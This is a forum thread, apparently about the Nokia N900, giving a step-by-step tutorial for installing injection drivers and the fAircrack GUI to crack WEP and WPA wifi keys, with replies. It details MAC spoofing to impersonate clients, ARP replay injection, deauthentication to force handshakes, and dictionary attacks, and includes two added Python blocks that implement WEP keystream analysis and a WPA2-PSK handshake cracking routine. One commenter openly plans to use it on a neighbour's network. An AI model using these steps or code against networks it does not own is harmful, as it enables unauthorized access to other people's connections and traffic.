Page 1 of 4
[Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Hello!
Tutorial Time! I see a lot of people looking for help in the announcement thread. I think that thread should be left for ideas, testing and development, not help. I am going to list all required help here. Post requests for help here.. BUT! Only if you have read and done everything written here! Don't skip a single step and you won't need help! I SWEAR! :D

Pre Stage: Open xTerm and type:
Code:
sudo apt-get moo

First things first! Open Package Manager and install "rootsh". Install: Power kernel. Then, in Xterm:
Code:
sudo apt-get install python

Step 1: Donate to lxp for the wifi drivers to get the files. You will receive the drivers. Or find these elsewhere.

Step 2: When you have received these (140MB'ish) drivers, download them to (or copy them into) your MyDocs [N900]. File = wl1251-maemo-0.1.tar.gz.

Step 3: This is also in the Readme file. Installation: Open X Terminal and type the following commands to untar the file:
Code:
cd /home/user/MyDocs
tar -xzvf wl1251-maemo-0.1.tar.gz

Driver Time (run these as root, i.e. after rootsh / sudo gainroot):
Code:
cd /home/user/MyDocs/wl1251-maemo/binary/kernel-power
dpkg -i kernel-power_2.6.28-maemo46-wl1_armel.deb
dpkg -i kernel-power-modules_2.6.28-maemo46-wl1_armel.deb
dpkg -i kernel-power-flasher_2.6.28-maemo46-wl1_armel.deb
dpkg -i kernel-power-bootimg_2.6.28-maemo46-wl1_armel.deb

This step is only needed if you have multiboot on your N900:
Code:
cd /boot

Next, create the multiboot item file containing:
Code:
ITEM_NAME="Maemo 2.6.28.10power46-wl1"

Select the kernel from the boot list: Maemo 2.6.28.10power46-wl1

Now time for fAIRCRACK! faircrack.tar.gz hildon.tar.gz

Part 1: Download faircrack.tar.gz AND hildon.tar.gz to MyDocs on your N900.

Part 2:
Code:
cd /home/user/MyDocs/
mkdir FAS
cd FAS
tar -xzvf /home/user/MyDocs/faircrack.tar.gz

Make sure all the files have been extracted to the MyDocs/FAS/ directory and that the following folders exist, by typing:
Code:
ls

MyDocs/FAS/keys/
MyDocs/FAS/diction/
MyDocs/FAS/cap/
MyDocs/FAS/cap/WEP/
MyDocs/FAS/cap/WPA/

Part 7: (icon!)
Code:
cd ..
(which brings you back to MyDocs/. Or just go to MyDocs in xTerm!)
Code:
tar -xzvf /home/user/MyDocs/hildon.tar.gz
sudo gainroot
mv faircrack.desktop /usr/share/applications/hildon/
mv faircrack.png /usr/share/icons/hicolor/48x48/hildon/

---------------------- Usage ----------------------------------------
To run fAircrack, you can use the shortcut (recommended), or issue the following command:
Code:
sh /home/user/MyDocs/FAS/launch.sh

Bear in mind that if you are running it from xterm you will probably see a few warning messages like "*.cap does not exist" and "basename usage". This is a result of my messy coding and does not cause any problems. This will be fixed in v0.2.

WEP
Firstly, a little background information from the aircrack wiki: "A little theory first. WEP is a really crappy and old encryption technique to secure a wireless connection. A 3-byte vector, called an Initialization Vector or IV, is prepended onto packets and it's based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate. Well, if it's on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition."

First things first, from the 'Monitor' tab enable the packet injection drivers and then monitor mode. At the moment there is no way to check if the drivers are enabled or not, so if you aren't sure then just click the enable button anyway.

Next, you will need to click on the 'Access Point' tab. From here select how many seconds to run a scan for (default is 5) and click the scan button. Make sure the WEP button is highlighted to show only WEP networks. Select your desired target and click the "Start Packet Capture" button. This will load airodump in an xterm. Be sure to leave this window open until you are ready to crack.

Now you must click the "Authenticate" button to attempt to authenticate with the network, which will allow you to perform packet injection. This will launch a new xterm which will display information about your authentication request. If you see a line similar to "AID 1 :-)" then all is good. If not, try changing your MAC address to the same as an already authenticated client (you can see them at the bottom of the airodump xterm). Bear in mind that changing your MAC requires the stopping and starting of your interface and it WILL close your airodump window.

Once authenticated, click the "Injection" button. This will launch a new xterm and start listening for ARP and ACK packets. As soon as an ARP packet is captured it SHOULD start re-injecting it at about 500pps (packets per second). At this point the number of ARP requests should start to skyrocket! If injection starts but the ARP number remains static, it means you need to authenticate with the router. Leave the authentication and injection windows open.

To check how many IVs you have successfully captured, click on the "Decryption" tab and select your current CAP file from the list. This will be the name of the network and a number. Now click the "Decrypt" button. It will load aircrack in a new xterm and, after reading the packets, it will display how many IVs have been captured and attempt to crack the key. You will normally need at least 50,000 IVs in order to perform a successful decryption, so if it is much less than this then you may as well close this window.

Once you are ready to crack, press the decrypt button and, if you have enough IVs, the password should be broken in seconds. At this point the aircrack xterm will close and you can view the key by selecting it from the list and clicking the "Show Key" button. If it doesn't show up, just press the "Refresh" button. (Keys are also stored in your MyDocs/FAS/keys/ directory.) If all went well then the whole process should take around 8-15 minutes.

WPA
WPA is different. Read the FAQs for more information. First scan for networks as before and select WPA to display the WPA access points. Now click on the one you want to crack and press the "Start Packet Capture" button. Now you will have to wait for a client to connect to the access point, at which point you will see a message in the top right of your airodump window saying "WPA Handshake" followed by the MAC address of the router. Now click on the "Decryption" tab. From here select the current cap from the list (being sure to select WPA and not WEP), then select either a dictionary or specify an attack method for John. When you are ready, highlight either "wordlist" or "john" and press decrypt.

------------------------------ FAQs -----------------------------------
Q. It keeps asking me for a password. Wtf?
A. Install Sudser.

Q. What's an access point?
A. Wireless router.

Q. What will I use this for?
A. If you don't know the answer to that then you don't need it.

Q. Why do I keep receiving deauth packets when authenticating?
A. I assume this is due to router security. Try changing your MAC (from the main menu) to match a client that is already connected. You can find this from the already opened airodump window.

Q. Why am I not receiving any ARP packets when trying to perform injection?
A. Depending on the access point, it may be very difficult to capture/relay ARP requests, particularly if:
> You are not close enough to the access point.
> There is no traffic on the access point. I find the number starts rising rapidly as soon as a client connects.

Q. I have tried everything, but just cannot inject/authenticate/anything. What gives?
A. Unfortunately, each make/model of router is different and no matter how hard you try you may not be able to get into it. fAircrack includes the settings that in my experience have been the most successful, but you may have better luck using aircrack directly and experimenting. (In future releases there will be far more options.)

Q. Why is WPA so much harder to crack?
A. WEP encryption is weak. Each IV (initialization vector) contains a small portion of the key, so when enough of these are captured the key can be deciphered. WPA however is far more secure and cannot be "cracked". However, when an authenticated client connects to a WPA access point a "handshake" is generated. This handshake can be captured by airodump and aircrack can subsequently run a bruteforce dictionary attack against it, possibly finding the key (however, if the exact key is not in the dictionary, it will obviously not work). To capture the handshake you can either wait for a client to connect, or you can launch a deauthentication attack (using my script) to force a client to disconnect and reconnect to the AP, allowing you to capture the handshake.

However, a word list big enough to 100% GUARANTEE to crack an 8-digit alphanumeric case-sensitive WPA key would have up to 6277101735386680763835789423207666416102355444464034512896 different combinations. And this is WITHOUT symbols. On the same basis, a 64-digit WPA key would have up to 39402006196394479212279040100143613805079739270465446667948293404245721771497210611414266254884915640806627990306816 different combinations. These wordlists would be thousands of terabytes in their totality. In short, it's possible but not feasible. Bear in mind that a device like the N900 could probably only check around 20-30 keys per second. The best you could do is capture the handshake with the N900 then use a desktop to attempt to crack the password. Realistically, the only way you are going to bruteforce a WPA key is if the person who the network belongs to (obviously you) has set something really mundane or stupid as their key. Any default key containing letters and numbers would be near enough impossible and take possibly years to break.

Enjoy. Press Thanks! :D
Credit goes to: FRuMMaGe for GUI
More will be added as needed.
Edit: Moo - http://scruss.com/wordpress/wp-conte...007/01/moo.png
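Added example, not code from the post above or from fAircrack/aircrack-ng: it builds a few constructed WEP frames with a known 40-bit key (the key, BSSID, client address and the three ARP packets are all made up here), counts unique IVs the way the "IVs captured" figure in the Decryption tab does, and shows the two properties the WEP attack in the post rests on. First, the IV is sent in the clear and RC4 is keyed with IV||key, so every frame under the same IV is encrypted with the same keystream and XORing two such ciphertexts cancels the keystream entirely. Second, every ARP frame starts with the same LLC/SNAP header, so the first keystream bytes for any IV can be read straight off a captured ARP frame, which is what makes ARP replay a reliable IV generator. The actual key recovery in aircrack-ng (the FMS/PTW statistics over many IVs) is beyond this block.

```python
import struct
import zlib
from collections import Counter

# Constructed sample values for the demonstration; not a real network's key or addresses.
WEP_KEY = bytes.fromhex("0102030405")          # 40-bit WEP key; the RC4 key is IV || WEP_KEY
BSSID = bytes.fromhex("020000000001")
CLIENT = bytes.fromhex("020000000002")
SNAP_ARP = bytes.fromhex("aaaa030000000806")   # LLC/SNAP header of every ARP frame: known plaintext


def rc4(key: bytes, n: int) -> bytes:
    """RC4 key scheduling followed by n bytes of keystream (WEP keys RC4 with IV||key)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < n:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_icv(plaintext: bytes) -> bytes:
    """WEP integrity value: a plain CRC-32, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_idx: int = 0) -> bytes:
    """WEP body: IV(3) | key index(1) | RC4(IV||key) XOR (plaintext || ICV)."""
    payload = plaintext + wep_icv(plaintext)
    return iv + bytes([key_idx << 6]) + xor_bytes(payload, rc4(iv + key, len(payload)))


def wep_decrypt(key: bytes, wep_body: bytes) -> bytes:
    """Reverse of wep_encrypt; raises ValueError if the ICV does not match."""
    iv, cipher = wep_body[:3], wep_body[4:]
    payload = xor_bytes(cipher, rc4(iv + key, len(cipher)))
    plaintext, icv = payload[:-4], payload[-4:]
    if icv != wep_icv(plaintext):
        raise ValueError("bad ICV")
    return plaintext


def data_frame(iv: bytes, plaintext: bytes) -> bytes:
    """802.11 data frame: 24-byte header (type=data, Protected flag set) + WEP body."""
    header = b"\x08\x41" + b"\x00\x00" + BSSID + CLIENT + BSSID + b"\x00\x00"
    return header + wep_encrypt(WEP_KEY, iv, plaintext)


def parse_wep_frames(frames):
    """Yield (iv, ciphertext) for each protected data frame, as airodump's IV counter sees them."""
    for f in frames:
        is_data = (f[0] & 0x0C) == 0x08
        protected = bool(f[1] & 0x40)
        if is_data and protected and len(f) > 28:
            yield f[24:27], f[28:]


def count_ivs(frames) -> Counter:
    """Unique IVs seen, with repeat counts (a repeated IV means a repeated keystream)."""
    return Counter(iv for iv, _ in parse_wep_frames(frames))


def recover_keystream_prefix(ciphertext: bytes, known: bytes = SNAP_ARP) -> bytes:
    """Known plaintext (LLC/SNAP of ARP) XOR ciphertext = the keystream bytes for that IV."""
    return xor_bytes(ciphertext[: len(known)], known)


def xor_of_reused_iv(frames, iv: bytes):
    """For two frames under the same IV, C1 XOR C2 == P1 XOR P2: the keystream cancels."""
    bodies = [c for i, c in parse_wep_frames(frames) if i == iv]
    if len(bodies) < 2:
        return None
    return xor_bytes(bodies[0], bodies[1])


def arp_packet(opcode: int, sender: bytes, sender_ip: bytes, target: bytes, target_ip: bytes) -> bytes:
    """Ethernet/IPv4 ARP body behind the SNAP header (constructed)."""
    return SNAP_ARP + struct.pack(">HHBBH", 1, 0x0800, 6, 4, opcode) + sender + sender_ip + target + target_ip


def sample_capture():
    """Three constructed frames; the third deliberately reuses the first frame's IV."""
    request = arp_packet(1, CLIENT, bytes([10, 0, 0, 2]), b"\x00" * 6, bytes([10, 0, 0, 1]))
    reply = arp_packet(2, BSSID, bytes([10, 0, 0, 1]), CLIENT, bytes([10, 0, 0, 2]))
    ivs = [b"\x00\x00\x01", b"\x00\x00\x02", b"\x00\x00\x01"]
    plaintexts = [request, reply, reply]
    frames = [data_frame(iv, pt) for iv, pt in zip(ivs, plaintexts)]
    return frames, ivs, plaintexts


if __name__ == "__main__":
    frames, ivs, pts = sample_capture()
    print("unique IVs:", len(count_ivs(frames)), "of", len(frames), "frames")
    print("keystream prefix for IV 000002:", recover_keystream_prefix(frames[1][28:]).hex())
    print("C0 xor C2 (same IV):", xor_of_reused_iv(frames, ivs[0]).hex())
```

Run it and the XOR of the two same-IV frames is exactly the XOR of the two ARP packets plus their ICVs; an attacker who knows one of them reads the other off directly. With only 2^24 IVs, and many cards picking them sequentially or at random, collisions are a matter of minutes on a busy network, which is why the post's 50,000-IV rule of thumb is about statistics rather than about the IV carrying key material.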
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Yeah, I needed a good complete tutorial to play with my neighbor's Wifi! Thanks Kingoddball for this!! You're the man!
Am I obliged to install Power Kernel?? I noticed that the phone won't reboot if I install it!!!
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Yeah.
Power Kernel has all needed modules. Install via package manager or terminal:
Code:
sudo apt-get install kernel-power
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Errr,..... sorry for the noob question, but what is "moo" and what are super cow powers??
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Thanks, Mart 5.1
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Moo!
It's a Linux/apt easter egg. Just do it! :) Enjoy it! Edit: ...."Have you mooed today?"...
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Moo! It's a Linux/apt easter egg. Just do it! :) Enjoy it! Edit: ...."Have you mooed today?"...
Ha ha, thanks Oddball, but what about "Nano"? What's that for?
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Text editor.
If you're new to it and don't want to learn, just install leafpad. Nano is my favourite console-based text editor. Simple. Fun. Looks geeky as hell! Nano is: http://www.my-maemo.com/grafika/nano.jpg
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Ah, I see now, thanks again. I will stick with leafpad for the time being. By the way, any news on Frummage and friends integrating wesside-ng into the GUI?
Thanks, mart5.1
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
@Mart5.1: No clue. I will ask if he is.
I had never heard of that! :D But after a simple bit of google-fu I found these! aircrack-ng, airdecap-ng, airdriver-ng, aireplay-ng, airmon-ng, airodump-ng, airolib-ng, airserv-ng, airtun-ng, buddy-ng, easside-ng, ivstools, kstats, makeivs-ng, packetforge-ng
Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Cheers, mart5.1
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
too lame...
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
What's lame?
If you don't like it, don't loiter around here :rolleyes:
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Really?
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
...or you could compile coWPAtty and run precomputed rainbow tables against the target network's specific ID.
Oh look! Insane 49 million password precomputed rainbow tables. The N900 could easily manage 20-30,000 passwords a second...
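Added example, not code from fAircrack, aircrack-ng, John or coWPAtty, covering both the OP's "why is WPA so much harder" FAQ and the coWPAtty rainbow-table comment above. It implements the WPA2-PSK derivation a dictionary attack has to redo for every candidate (PBKDF2-HMAC-SHA1 with 4096 iterations to get the PMK, the 802.11i PRF-512 to get the PTK, and the HMAC-SHA1-128 MIC over message 2 of the 4-way handshake), runs it against a constructed handshake whose SSID, MAC addresses, nonces and passphrase are all made up here, and then shows what a precomputed "rainbow table" for WPA really is: a PMK lookup table keyed by passphrase for one SSID, which is why coWPAtty's tables are per-ESSID and useless against a network with a different name.

```python
import hashlib
import hmac
import struct

# Constructed handshake parameters for the demonstration; none of these are real.
SSID = "TestNet"
AP_MAC = bytes.fromhex("020000000001")
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81  # offset of the Key MIC field in an EAPOL-Key frame (4-byte 802.1X header + 77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512; the first 16 bytes of the PTK are the KCK that signs the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_key_frame(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Minimal message 2 of the 4-way handshake (WPA2/RSN, key descriptor version 2) with MIC zeroed."""
    body = (b"\x02"                                   # descriptor type: RSN
            + b"\x01\x0a"                             # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + b"\x00\x10"                             # key length
            + struct.pack(">Q", replay_counter)
            + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, key ID
            + b"\x00" * 16                            # MIC placeholder
            + b"\x00\x00")                            # key data length
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """HMAC-SHA1 over the EAPOL frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def mic_matches(pmk: bytes, hs: dict) -> bool:
    kck = ptk_from_pmk(pmk, hs["ap"], hs["client"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16])


def check_candidate(passphrase: str, hs: dict) -> bool:
    """One full guess: 8192 SHA-1 HMACs for the PMK, then PRF-512 and one MIC."""
    return mic_matches(pmk_from_passphrase(passphrase, hs["ssid"]), hs)


def dictionary_attack(hs: dict, wordlist):
    for word in wordlist:
        if check_candidate(word, hs):
            return word
    return None


def precompute_pmks(wordlist, ssid: str) -> dict:
    """What a coWPAtty/genpmk table holds: passphrase -> PMK, bound to one SSID."""
    return {word: pmk_from_passphrase(word, ssid) for word in wordlist}


def table_attack(hs: dict, table: dict):
    """With PMKs precomputed, each guess costs only the PRF-512 and the MIC check."""
    for word, pmk in table.items():
        if mic_matches(pmk, hs):
            return word
    return None


def sample_handshake(passphrase: str = "letmein99") -> dict:
    """Constructed capture: the fields aircrack/cowpatty pull out of a handshake .cap file."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    frame = eapol_key_frame(SNONCE)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": frame}


if __name__ == "__main__":
    hs = sample_handshake()
    words = ["password", "12345678", "letmein99", "qwertyuiop"]
    print("dictionary:", dictionary_attack(hs, words))
    print("table:", table_attack(hs, precompute_pmks(words, SSID)))
    print("table for other SSID:", table_attack(hs, precompute_pmks(words, "OtherNet")))
```

Only the PMK step depends on the passphrase and SSID, so a table of PMKs turns a 4096-iteration PBKDF2 per guess into a handful of HMACs, which is where the "thousands of passwords a second" figure comes from; the same table is worthless against a network with a different SSID because the SSID is the PBKDF2 salt. Note also that everything the attacker needs besides the passphrase (both MACs, both nonces, the signed EAPOL frame) is sent in the clear in the handshake, which is why a single captured handshake is enough to take the attack offline.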
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
WPA is very hard. Mine is not the default router password. It's not a word. It's a combination. 12 digits. It could take weeks/months or even years for a brute force attack.. :(
I wanna try to hit a WPA network - mine even! :D Up to 30,000 per minute?! What!? :eek: Are you sure? I thought it was a LOW number. I'm sure I could spare 1.9GB! The N900 is a powerhouse of storage! I have 40GB atm. It was 48GB.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
I need help changing my MAC. Can somebody guide me?
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
I lol'd at people asking what apt-get moo does and why they need it :')
Thanks for the guide. My phone needed a reflash at 3AM this morning; now I don't even need to think about what I'm doing.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
1 Attachment(s)
First, ty for the guide, but I have a problem. I followed your guide and all went well, except that when I try to use the shortcut nothing happens and it closes back to the desktop, and when I use the x-term I get this (see attachment)..any suggestions..ty
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Install PyQt4 Full from the repos.
Quote:
Code:
# any valid hex MAC; pick one of the clients shown in the airodump window
macchanger --mac=00:11:22:33:44:55 wlan0
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Install PyQt4 Full from the repos.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Why does aircrack keep sending association requests with no response?
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Potentially because you need to change your MAC to the same as a pre-authenticated client on the network.
You can also change your MAC from within the GUI for fAircrack. Monitor tab.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
1 Attachment(s)
Quote:
I know that this might sound stupid, but can somebody point me to what MAC address I should change to?
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Bear in mind that if you attempt to authenticate then your own MAC will appear as well, even if unsuccessful.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
@Ammyt: What type of network are you "hitting"?
Is it a big company? WEP? I found one (in my house of course ;) ) and I can get authenticated but can not get a single piece of data. I think it's just a bare router, no actual internet connection. Maybe the router is using MAC filtering. Write down a few of the MACs in the airodump window (as you have posted) and try those. Or just try pressing the random button (update to the new fAircrack). Also, to change it in fAircrack: click on the Monitor tab and, on the right side, enter the MAC you want or click random, then save.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Why can I only detect other routers but not my own router????
My router is also using WEP, but the funny thing is that even when I can detect my own router I cannot start packet capture, but I can if I try it on another router....
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Apparently larger networks (i.e. big warehouses) are "recommended" to use WEP? Why? NO CLUE! ;)
But that's what I have seen. One I have seen (although I knew the password already) is 26 digits, all numbers. WEP. MASSIVE network. But somehow the one WEP key will give you access to ALL company sites Australia-wide (which is probably why they use WEP).
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Just a tip that I mentioned in the fAircrack topic.
You need the power kernel from the list on page 1 in order to be able to load the injection drivers properly. You must have kernel-power_2.6.28-maemo46-wl1. I had the kernel from the extras repositories and I had errors like "wlan0 device not found" or "insmod: invalid parameters". You should also install the packages from page 1 manually in the terminal and not by opening them with HAM.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Thanks for the tutorial. Is there any info on disconnecting clients?
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Great, thank you, I managed to decipher my WEP key ... So now I want to attack myself ... I have a WPA network at home with a simple 8-digit WPA key ...
So, I enable packet injection, enable monitor mode, then in the Access Point tab I scan for WPA and I find my network fine. I hit "Start packet capture", an xterminal opens, ok .. I disconnect and reconnect and get the "WPA handshake". I go to the Decrypt tab. I select my WPA network entry, and so, as I understand it, I have 2 methods to try to break the famous key: with a wordlist or with john. So what format do the dictionaries take? I understand where to put them (FAS/diction), but what is the format? And where can I find one for France? Can we create one just to try our own password in, to see if it works? Then the 2nd method is with john; does it also need a dictionary selected for this method? How does it work there? At what point does one see that the key was found? Does the terminal close like with a WEP key if it's good? Thank you for your answers and excuse my ugly English haha
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
I can't do the following commands (step 4, driver time):
Code:
cd /home/user/MyDocs/wl1251-maemo/binary/kernel-power
dpkg -i kernel-power_2.6.28-maemo46-wl1_armel.deb
It says "incompatible version". I don't know what to do. I can enter the wl12..-maemo folder but I can't enter the binary folder. It says something like "sh: cd: can't cd to binary". Please help me, guys.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
2 Attachment(s)
Quote:
Code:
lsmod | grep wl12
When the modules are enabled, the output of "lsmod | grep wl12" looks like this: Attachment 17714. When the modules are disabled it looks like this: Attachment 17715.
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Thanks for this! By the way, you need to change the install instructions for John the Ripper to:
Code:
sudo apt-get install john
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
When I type these commands:
Code:
cd /boot
mv zImage-2.6.28-maemo46-wl1 multiboot/vmlinuz-2.6.28.10power46-wl1
I get "mv: can't rename zImage-2.6.28-maemo46-wl1: No such file or directory". Any solution, please?
Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
Quote:
Btw, I'd suggest you use SSH..it'll be much easier for you..copying, pasting, moving and renaming can be done easily over SSH rather than on the command line..the chances of bricking your phone when using the CLI are higher than when using SSH..